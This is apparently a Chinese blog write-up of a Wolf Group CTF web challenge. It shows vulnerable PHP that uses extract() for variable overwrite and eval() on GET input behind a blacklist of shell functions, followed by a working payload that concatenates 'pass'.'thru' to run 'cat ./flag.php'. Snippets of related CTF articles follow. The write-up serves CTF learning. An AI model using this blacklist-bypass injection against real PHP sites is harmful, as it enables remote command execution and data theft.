狼组CTF WEB题 代码审计之代码注入

最新推荐文章于 2025-09-02 12:41:43 发布
原创 最新推荐文章于 2025-09-02 12:41:43 发布 · 766 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文深入解析了一段PHP代码,揭示了其中的变量覆盖漏洞和禁用函数绕过的安全问题。通过分析代码结构和执行流程,展示了如何利用特定payload绕过安全限制,最终获取flag。同时,强调了在实际应用中防范此类安全风险的重要性。

献上源码

<?php
show_source(__FILE__);
error_reporting(0);
$you = "you are ?";
extract($_POST);
if($you != 'i am pig'){
    echo '<img src="./Ding.gif">'."</br>";
    die('Ding Ding Ding ~');
}

$peiqi = ["y","eval","assert","print_r","system", "shell_exec","ini_set", "scandir", "exec","proc_open", "error_log", "ini_alter", "ini_set", "pfsockopen", "readfile", "echo", "file_get_contents", "readlink", "symlink", "popen", "fopen", "file", "fpassthru"];
$peiqi = array_merge($peiqi, get_defined_functions()['internal']);
foreach($peiqi as $i){
    if(stristr($_GET[peiqi], $i)!==false){
        echo '<img src="./heihei.jpg">'."</br>";
        die('修完bug就可以睡觉了,嘿嘿嘿~');
    }
}
eval($_GET[peiqi]);
//flag 在 ./flag.php里
?>

禁用函数

$peiqi = ["y","eval","assert","print_r","system", "shell_exec","ini_set", "scandir", "exec","proc_open", "error_log", "ini_alter", "ini_set", "pfsockopen", "readfile", "echo", "file_get_contents", "readlink", "symlink", "popen", "fopen", "file", "fpassthru"];
$peiqi = array_merge($peiqi, get_defined_functions()['internal']);

变量覆盖漏洞过第一个卡,POST提交 you=i am pig,敲钉子图片消失

$you = "you are ?";
extract($_POST);
if($you != 'i am pig'){
    echo '<img src="./Ding.gif">'."</br>";
    die('Ding Ding Ding ~');
}

后面的代码是判断GET提交的参数,是不是包含禁用的函数,因为最后GET提交的参数会交给eval函数执行,此处可以考虑使用拼接php代码来绕过。
获取flag命令 cat ./flag,因为禁用了y,不是使用system函数,使用passthru拼接绕过
payload:

peiqi=$a=pass;$b=thru;$c=$a.$b;$d='cat ./flag.php';$c($d);

flag在源码里_

[网络安全自学篇] 八十.WHUCTFWEB类解思路WP(代码审计、文件包含、过滤绕过、SQL注入
杨秀璋的专栏
05-29 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。这篇文章将介绍WHUCTF部分目,第一次参加CTF,还是能学到很多东西。下面分享四个我完成的WEB类型目的解过程,希望对您有所帮助。本来感觉能做出6道目,但有两道卡在某个点,后面几天忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬
CTF-web记录(狼组/BUUCTF)【一】
weixin_39664643的博客
10-16 2988
CTF-web记录(狼组/BUUCTF)【一】 WEB 1、ctf.wgpsec 你可能需要一部iphone 目如下 考察点:user-agent,burp改为iphone的user-agent,发包得到flag 2、ctf.wgpsec baby php 坑:代码理解错误,淦 考察点:代码理解,根据代码本身绕过 <?php highlight_file('source.txt'); echo "<br><br>"; $flag = 'xxxxxxxx'; $ms
WgpSec(狼组安全) CTF PHPCode目记录
e6678的博客
03-23 1890
PHPCode strcmp 目描述 <?php include("flag.php"); highlight_file(__FILE__); if (isset($_GET['a'])) { if (strcmp($_GET['a'], $flag) == 0) //如果 str1 小于 str2 返回 < 0; 如果 str1大于 str2返回 > 0;如果两者相等,返回 0。 //比较两个字符串(区分大小写) die('Flag:
PHP渗透测试目笔记
Zeker62的博客
02-10 5940
最简单反序列化漏洞陷阱 PHP反序列化漏洞PHP魔术方法执行顺序CTFHub-2020网鼎杯AreUSerialz攻防世界:unserialize3目解析攻防世界:PHP2 最简单反序列化漏洞 简单实例,如下是一串简单的PHP代码,index.php里面包含了flag.php 这个文件 <?php // 关闭错误报告 error_reporting(0); include "flag.php"; $key="020202"; $str=$_GET['str']; if(unserializ
php序列化和反序列化-ctf
时光凉春衫薄的博客
08-08 1401
<?php error_reporting(0); include "key4.php"; $TEMP = "Whatever is worth doing is worth doing well."; $str = $_GET['str']; if (unserialize($str) === $TEMP) { echo "$key4"; } show_source(__FILE__); 通过上述得知unserialize($str)中反序列化后的值等于Whatever is worth.
PHP命令执行集锦
蚁景网安学院
03-21 2647
代码审计总要遇到命令执行或者说RCE,打CTF的过程中难免不会碰见,毕竟PHP是世界上最好的语言,总结一下...
精选资源
CTF工具之seay源代码审计系统(web).rar
09-16
CTF工具之seay源代码审计系统(web)】是一个专门为网络安全竞赛(CTF,Capture The Flag)设计的源代码审计工具,主要用于Web安全领域。这个工具的主要目的是帮助参赛者或者安全研究人员检测和分析Web应用程序中...
精选资源
【网络安全竞赛】CTF Web型解技巧与常用工具总结:涵盖Web漏洞挖掘、流量分析及代码审计方法
05-13
内容概要:本文档介绍了CTF竞赛中Web型的解技巧,涵盖从基础到进阶的各种知识点。首先介绍了基础工具如Burpsuite、Python、Firefox及其插件,以及扫描工具如Nmap、Nessus和OpenVAS。接着详细讲述了常见解套路...
网络安全CTF Web实战练习:常见Web漏洞利用与防护技巧详解-SQL注入、脚本编写及数据包分析
08-18
使用场景及目标:①了解并掌握常见的Web攻击手法,如SQL注入代码审计、文件上传漏洞等;②学习如何使用各类工具辅助解,如Burpsuite、Wireshark、sqlmap等;③培养细致入微的观察能力和逻辑推理能力,提高解决...
44、CTF中的取证技术与代码审计
最新发布
nept的博客
09-02 140
本文详细介绍了CTF竞赛中常见的取证技术和代码审计方法。内容涵盖压缩文件攻击、流量分析(Wireshark/Tshark)、内存和磁盘映像取证、PHP及Java代码审计要点,并提供环境搭建和实战分析示例。同时总结了应对CTF综合挑战的策略,包括知识储备、团队协作和时间管理。适合网络安全爱好者和CTF参赛者学习参考。
NISACTF 2022 writeup
热门推荐
st1cky的博客
03-29 4万+
周末两天的比赛 WEB(11/12)、PWN(5/6)、Reverse(3/6)、Crypto(3/7)、Misc(8/12) WEB没有AK还是略有遗憾,到后面实在做不动了。 第一次写这么长的WP… WEB checkin <?php error_reporting(0); include "flag.php"; // ‮⁦NISACTF⁩⁦Welcome to if ("jitanglailo" == $_GET[ahahahaha] &‮⁦+!!⁩⁦& "‮⁦ Flag!.
php {0110 &^ 1011 =,从一道CTF目中学习新的无字母webshell构造
weixin_35460589的博客
03-20 422
前言前几天的RCTF2020中,有一道webcalc考察的是构造无字母的shell,非常有学习意义,这里跟各位师傅分享一下。本人菜鸟一枚,文章中如有不对的地方,望各位师傅指出,勿喷~~~目分析error_reporting(0);if(!isset($_GET['num'])){show_source(__FILE__);}else{$str = $_GET['num'];$blacklist...
CTF——Web——文件包含漏洞
小锤队长的博客
08-19 1万+
转载于 信安之路 :https://cloud.tencent.com/developer/article/1180857 文件包含原理: 原理 文件包含漏洞的产生原因是在通过 PHP 的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。 php 中引发文件包含漏洞的通常是以下四个函数: 1、include() 当...
文件包含漏洞总结
金色%夕阳的博客
08-19 1915
文件包含漏洞总结 CTF中文件包含漏洞 0x01 什么是文件包含漏洞 0X02 文件包含漏洞的环境要求 0X03 常见文件包含函数 0X04 PHP伪协议 1、PHP://INPUT 2、PHP://FILTER 3、ZIP:// 4、DATA://与PHAR:// 0x05 包含APACHE日志文件 0x0
ctfshow-php特性
YkingH的博客
01-26 6429
Web专项练习—ctfshow-php特性 php绕过方法总结 小数绕过 进制绕过 ==、 = ==绕过 %20空格绕过 %0a换行绕过 回车\空格+八进制绕过 相对路径绕过 php伪协议读取文件 数组md5值为0 弱类型匹配 函数写???? 运算优先级漏洞 反射类绕过 call_user_func()绕过 sha1()函数绕过 变量覆盖 sha1弱比较 md5弱比较 ereg()截断漏洞 php内置类 FilesystemIterator 压缩过滤器绕过 空格代替url ‘_’ 绕过 gettex
WEB攻防-PHP特性-学以致用
luffysec的博客
01-11 4685
学习笔记-WEB攻防-PHP特性-学以致用
关于PHP代码审计的一些
Animation77的博客
09-07 1999
目一: <?php ////phpinfo(); error_reporting(0); show_source(__file__); preg_replace($_GET["a"], $_GET["b"], $_GET["c"]); ?> 解思路:先看preg_replace函数定义 这里用到了一个小技巧,用到 /e(有些php版本不支持,我这里是可以的), 这...
CTF Web方向考点总结
qq_41513009的博客
09-20 2万+
ctf web考点总结
CTFWEB 代码执行&命令执行&CTFSHOW wp
m0_48736242的博客
10-02 2419
CTFWEB 代码执行&命令执行&CTFSHOW wp
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值